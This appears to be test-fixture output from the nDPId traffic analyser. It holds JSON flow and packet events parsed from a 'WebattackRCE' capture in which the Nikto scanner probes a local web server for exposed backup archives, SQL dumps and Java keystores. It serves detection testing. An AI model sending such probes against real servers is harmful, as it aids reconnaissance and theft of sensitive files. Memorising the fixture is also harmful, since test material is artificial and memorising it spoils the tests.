+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1576420277299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277299,"pkt":"AAAAAAAAAAAAAAAACABFAADATXFAAEAG7sR\/AAABfwAAAcSeH5C5OnXDLQhZdIAYAED+tAAAAQEICp1m\/VudZv1bR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1576420277301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277301,"pkt":"AAAAAAAAAAAAAAAACABFAADAvp1AAEAGfZh\/AAABfwAAAcSgH5BBBoY3\/wT40oAYAED+tAAAAQEICp1m\/V2dZv1dR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1576420277302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277302,"pkt":"AAAAAAAAAAAAAAAACABFAADG+c1AAEAGQmJ\/AAABfwAAAcSiH5Dkc8Fn99puBYAYAED+ugAAAQEICp1m\/V6dZv1eR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1576420277304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277304,"pkt":"AAAAAAAAAAAAAAAACABFAADGn2FAAEAGnM5\/AAABfwAAAcSkH5ABoKfybJgPqoAYAED+ugAAAQEICp1m\/WCdZv1gR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1576420277306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277306,"pkt":"AAAAAAAAAAAAAAAACABFAADBq8lAAEAGkGt\/AAABfwAAAcSmH5B085NqCLeHfoAYAED+tQAAAQEICp1m\/WGdZv1hR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1576420277307,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277307,"pkt":"AAAAAAAAAAAAAAAACABFAADBE+BAAEAGKFV\/AAABfwAAAcSoH5A\/FCtx8eapa4AYAED+tQAAAQEICp1m\/WOdZv1jR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1576420277308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277308,"pkt":"AAAAAAAAAAAAAAAACABFAADBd5tAAEAGxJl\/AAABfwAAAcSqH5Asxk83LE5RU4AYAED+tQAAAQEICp1m\/WSdZv1kR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1576420277309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277309,"pkt":"AAAAAAAAAAAAAAAACABFAADB9HRAAEAGR8B\/AAABfwAAAcSsH5BlTMzeEpcpJ4AYAED+tQAAAQEICp1m\/WWdZv1lR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1576420277310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277310,"pkt":"AAAAAAAAAAAAAAAACABFAADFcQdAAEAGyyl\/AAABfwAAAcSuH5C\/jUmrZ8IhxYAYAED+uQAAAQEICp1m\/WadZv1mR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1576420277311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277311,"pkt":"AAAAAAAAAAAAAAAACABFAADFdZ1AAEAGxpN\/AAABfwAAAcSwH5BGIE0sZXhTqYAYAED+uQAAAQEICp1m\/WedZv1nR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1576420277313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277313,"pkt":"AAAAAAAAAAAAAAAACABFAADESF9AAEAG89J\/AAABfwAAAcSyH5CXAnDudCS+HoAYAED+uAAAAQEICp1m\/WmdZv1oR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 